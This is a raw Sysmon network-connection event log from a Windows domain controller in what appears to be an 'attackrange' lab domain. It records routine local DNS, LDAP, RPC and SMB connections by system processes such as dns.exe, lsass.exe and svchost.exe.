AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55240- 354300x80000000000000001054663Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.282{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53485- 354300x80000000000000001054662Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.282{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64364- 354300x80000000000000001054661Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.281{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local49680- 354300x80000000000000001054660Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.280{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50385- 354300x80000000000000001054659Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.278{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62294- 354300x80000000000000001054658Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.278{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local52480- 354300x80000000000000001054657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.275{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56378- 354300x80000000000000001054656Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.274{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local54787- 354300x80000000000000001054655Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.274{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local62269- 354300x80000000000000001054654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.273{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54604- 354300x80000000000000001054653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.272{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local55883- 354300x80000000000000001054652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.271{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local63157- 354300x80000000000000001054651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.271{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50102- 354300x80000000000000001054650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.267{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50694- 354300x80000000000000001054649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.266{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local63252- 354300x80000000000000001054648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.265{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local61622- 354300x80000000000000001054647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.263{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50185- 354300x80000000000000001054646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.263{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53827- 354300x80000000000000001054645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.261{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64304- 354300x80000000000000001054644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.261{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54667- 354300x80000000000000001054643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.260{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local55635- 354300x80000000000000001054642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.259{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local49653- 354300x80000000000000001054641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.259{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51498- 354300x80000000000000001054640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.259{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local52257- 354300x80000000000000001054639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.257{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local49719-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001054638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.257{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49719-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001054637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.256{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50150- 354300x80000000000000001054636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.256{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local64007- 354300x80000000000000001054635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.255{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65347- 354300x80000000000000001054634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.254{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local63156- 354300x80000000000000001054633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.254{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local65427- 354300x80000000000000001054632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53245- 354300x80000000000000001054631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.253{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local51992- 354300x80000000000000001054630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.251{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local63849- 354300x80000000000000001054629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.251{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53422- 354300x80000000000000001054628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.250{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local54694- 354300x80000000000000001054627Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.249{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local49161- 354300x80000000000000001054626Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.246{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64028- 354300x80000000000000001054625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.246{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local62658- 354300x80000000000000001054624Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.245{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local56372- 354300x80000000000000001054623Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.244{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local52000- 354300x80000000000000001054622Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.244{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49718-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.244{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49718-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001054620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.243{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local65391- 354300x80000000000000001054619Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.242{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50049- 354300x80000000000000001054618Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.241{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50501- 354300x80000000000000001054617Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.238{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local55592- 354300x80000000000000001054616Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.238{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49717-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001054615Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.238{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49717-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001054614Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.238{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50842- 354300x80000000000000001054613Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.237{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49716-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001054612Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.237{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49716-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001054611Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.235{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54709- 354300x80000000000000001054610Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.234{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local55132- 354300x80000000000000001054609Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.234{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local54571- 354300x80000000000000001054608Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.233{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local50154- 354300x80000000000000001054607Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.233{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local62810- 354300x80000000000000001054606Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.231{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62266- 354300x80000000000000001054605Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.230{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50619- 354300x80000000000000001054604Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.229{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local53313- 354300x80000000000000001054603Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.229{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49715-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001054602Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.229{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49715-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001054601Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.229{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local64313- 354300x80000000000000001054600Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.221{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64477- 354300x80000000000000001054599Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.221{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local54614- 354300x80000000000000001054598Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.220{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49714-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001054597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.220{5EBD8912-8CD0-6151-2D00-00000000FD01}2452C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49714-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49672- 354300x80000000000000001054596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.220{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local50099- 354300x80000000000000001054595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.219{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local51510- 354300x80000000000000001054594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.216{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53217- 354300x80000000000000001054593Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.216{5EBD8912-8CBF-6151-0D00-00000000FD01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49713-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001054592Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.216{5EBD8912-8CD0-6151-2D00-00000000FD01}2452C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49713-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001054591Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.215{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local62158- 354300x80000000000000001054590Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.215{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local49901- 354300x80000000000000001054589Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.214{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local64163- 354300x80000000000000001054588Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.214{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local63621- 354300x80000000000000001054587Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.212{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local52379- 354300x80000000000000001054586Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.211{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.14win-dc-429.attackrange.local65419- 354300x80000000000000001054585Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:40.210{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-61538-false127.0.0.1-53domain 354300x80000000000000001054584Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 